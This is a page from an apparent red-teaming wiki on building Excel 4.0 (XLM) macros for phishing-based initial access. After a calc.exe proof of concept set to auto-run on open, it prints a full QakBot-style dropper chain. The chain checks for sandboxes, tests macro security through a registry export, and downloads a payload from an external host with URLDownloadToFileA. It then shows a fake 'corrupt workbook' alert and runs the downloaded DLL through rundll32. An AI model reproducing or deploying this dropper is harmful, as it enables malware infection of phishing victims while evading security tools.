Red Teaming and Malware Analysis
  • About
  • Red Teaming
  • Cheat Sheet
    • Web
      • Misc
      • File Upload bypass
      • Authentication bypass
      • SQL Injection
      • XSS
      • XXE
      • Reverse-shell
      • Webshell
      • (De)Serialization
    • Active Directory
    • Services by port
      • Enum
      • 5060 - SIP
      • 25 - SMTP
      • 135 - RPC
      • 445 - SMB
      • 11211 - PHPMemCached
      • ldap
    • Hardening
    • Stuff
      • Basic tips/scripts
      • OpenBSD & NetBSD
      • File Transfer
      • Pivoting
  • Active Directory 101
    • Dumping Active Directory DNS using adidnsdump
    • PrintNightmare
    • From DFSCoercer to DA
  • Fuzzing and Web
    • Server Side Template Injection (SSTI)
    • Finding SSRF (all scope)
    • Format String Exploitation
    • Cache Poisoning using Nuclei
  • Initial Foothold
    • Browser In The Browser (BITB) Attack
    • Phishing with Office
      • Weaponizing XLM 4.0 macros
  • Privilege Escalation (Privesc)
    • AV/EDR Bypass
      • Bypass AV/EDR using Safe Mode
      • Resources
    • UAC bypass
    • Process migration like meterpreter
  • Lateral Movement (Pivoting)
    • From Windows VPN + Kali VPN + DC
      • By using Proxifier
  • Persistence
  • Command and Control (C&C)
    • CobaltStrike 101
      • Pivoting DMZ: weevely + ngrok + CS Pivot COMBO via Linux
      • Extras + Plugins
      • Resources
  • Data Exfiltration
    • Extracting certs/private keys from Windows using mimikatz and intercepting calls with burpsuite
  • CVE & Exploits / CTF
    • Privilege Escalation
    • Serialization
    • CVEs
      • CHIYU IoT devices
      • Chamilo-lms-1.11.x - From XSS to account takeover && backdoor implantation
    • CVE - Submission Guides
  • Tools
    • Intel
    • OSINT
    • DNS
    • WEB
      • API and WS Hacking
      • Web Discovery
      • Web Fuzzing
      • Path Traversal
      • GraphQL
      • JWT
    • Infrastructure and Network
      • Scan and Discovery
        • Network mapper
      • Automated Scanners
      • Misc
      • Active Directory
        • Burpsuite with Kerberos Auth
      • Cloud & Azure
      • Command and Control (C&C)
      • (De)serialization
      • Lateral Movement
      • Powershell
    • Privilege Escalation
    • Exfiltration
    • Persistence
    • Password & Cracking
      • Wordlists
      • Tips
      • Rainbow Crackalack
    • Static Code Analysis
    • Reporting
  • Resources
  • Pwnage
    • WiFi
      • HOSTAPD-WPE
      • Rogue APP
      • WPA3 Downgrade attack
    • NRF
    • rubber ducky
  • Malware Analysis
  • Unpacking
  • Basic tips
  • Malware instrumentation with frida
  • Tools
    • Debuggers / Disassemblers
    • Decompilers
    • Detection and Classification
    • Deobfuscation
    • Debugging and Reverse Engineering
    • Memory
    • File Analysis
    • Emulators
    • Network Traffic Analysis
    • Other
    • Online Tools
  • Resources
    • DFIR FTK Imager
    • Convert IP Range into CIDR
    • Parsing Large Raw Files and Excluding Country IP Address Ranges
    • Windows Logs Automation
      • amcache.hve
    • Windows EventViewer Analysis | DFIR
    • Prevent Windows shutdown after license expire
    • Firewall raw Logs
  • Mobile
    • Tools
    • Reverse iOS ipa
      • Jailbreak
      • Install Frida iPhone 5S
      • Frida instrumentation
      • Resources / Extra features
    • Reverse Android APKs
      • Android Dynamic Analysis
      • Bypass root + Frida
      • SSL unpining frida + Fiddler/Burp
      • Backdooring/patch APKs
    • Basic tips
    • Resources
  • IoT / Reverse / Firmware
    • Basic tips
      • Repair NTFS dirty disks
    • Reverse IoT devices
      • Reverse TP-Link Router TL-WR841N
      • Reverse Trendnet TS-S402 firmware
      • Full emulate Netgear WNAP320
      • Reverse ASUS RT-AC5300
      • Reverse LinkOne devices
    • Tools
      • Qemu + buildroot 101
      • Kernel
    • Resources
Powered by GitBook
On this page
  • Playing with XML Macros
  • Weaponizing XML macros

Was this helpful?

  1. Initial Foothold
  2. Phishing with Office

Weaponizing XLM 4.0 macros

PreviousPhishing with OfficeNextPrivilege Escalation (Privesc)

Last updated 4 years ago

Was this helpful?

XLM macros a part of the Microsoft Office suite, and are an amazing resource to implement an initial foothold scenario to execute payloads in a red teaming exercise. This scenario is inspired on the following malwares that abuse XLM macro to load the first stage into the memory.

Playing with XML Macros

To start this laboratory, the first step is to create the XML macro inside an Excel document.

Click on "Sheet" / Right click / Add "XML Macro 4.0" / OK

After that, a new sheet will be created as presented below.

As a first test, we can execute "calc.exe" process when the macro is opened.

=EXEC("calc.exe")
=HALT()

Note how we need to rename the A1 cell to Auto_Open if we want the Macros to fire off once the document is opened:

After that, we can "save" our first PoC. Remember to save the document with Seet with privileges to execute Excel Macros (at the top of the options).

Weaponizing XML macros

In order to perform a more complex scenario, we can simply adopt the approach used for instance by QakBot trojan malware.

=IF(GET.WORKSPACE(19),,CLOSE(TRUE))
=IF(GET.WORKSPACE(42),,CLOSE(TRUE))
=IF(ISNUMBER(SEARCH(“Windows”,GET.WORKSPACE(1))), ,CLOSE(TRUE))
=CALL(“Shell32″,”ShellExecuteA”,”JJCCCJJ”,0,”open”,”C:\Windows\system32\reg.exe”,”EXPORT HKCU\Software\Microsoft\Office\”&GET.WORKSPACE(2)&”\Excel\Security c:\users\public\1.reg /y”,0,5)
=WAIT(NOW()+”00:00:03″)
=FOPEN(“c:\users\public\1.reg”)
=FPOS(R[-1]C, 215)
=FREAD(R[-2]C, 255)
=FCLOSE(R[-3]C)
=FILE.DELETE(“c:\users\public\1.reg”)
=IF(ISNUMBER(SEARCH(“0001”,R[-3]C)),CLOSE(FALSE),)
=CALL(“urlmon”,”URLDownloadToFileA”,”JJCCJJ”,0,”https://ddfspwxrb.club/fb2g424g”,”c:\Users\Public\csg75ef.html”,0,0)
=IF(R[-1]C<0,CALL(“urlmon”,”URLDownloadToFileA”,”JJCCJJ”,0,”https://ddfspwxrb.club/fb2g424g”,”c:\Users\Public\bwep5ef.html”,0,0),)
=ALERT(“The workbook cannot be opened or repaired by Microsoft Excel because it’s corrupt.”,2)
=CALL(“Shell32″,”ShellExecuteA”,”JJCCCJJ”,0,”open”,”C:\Windows\system32\rundll32.exe”,”c:\Users\Public\csg75ef.html,DllRegisterServer”,0,5)
=CLOSE(FALSE)

The first two lines in the code are a particular highlight. These lines are actually an anti-evasion technique used to identify whether the file is facing a human or a machine (a sandbox). The GET.WORKSPACE() command gathers information about the properties of the environment. Each property is referenced by a number.

The documentation for the two investigated properties is as follows:

  • 19: If a mouse is present, returns TRUE; otherwise, returns FALSE.

  • 42: If your computer is capable of playing sounds, returns TRUE; otherwise, return FALSE.

These two properties, when being negative, are a fairly good indication for the malware to “understand” if it run inside a sandbox. Hence, the =IF(GET.WORKSPACE(19),,CLOSE(TRUE)) statement basically means that if the code is running inside a sandbox, it needs to “bail-out”, and avoid continuing to the malicious parts of the macro. This allows the sample to evade some dynamic security products that lack the proper emulation of such characteristics.

As expected, the calc.exe is launched when the excel file is opened.

😎
LogoA taste of the latest release of QakBotSegurança Informática
Logo[SI-LAB] FlawedAmmyy Leveraging Undetected XLM Macros as an Infection VehicleSegurança Informática
LogoGitHub - FortyNorthSecurity/EXCELntDonut: Excel 4.0 (XLM) Macro Generator for injecting DLLs and EXEs into memory.GitHub